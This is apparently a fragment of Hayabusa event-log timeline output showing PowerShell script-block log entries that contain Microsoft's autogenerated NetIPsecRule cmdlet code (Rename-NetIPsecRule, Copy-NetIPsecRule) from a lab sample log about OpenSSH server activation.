'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = 
$PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecRule' -Alias '*' function Copy-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] 
[Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"yBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 
'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact 
($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, 
$__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecRule' -Alias '*' function Copy-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] 
${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, 
[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
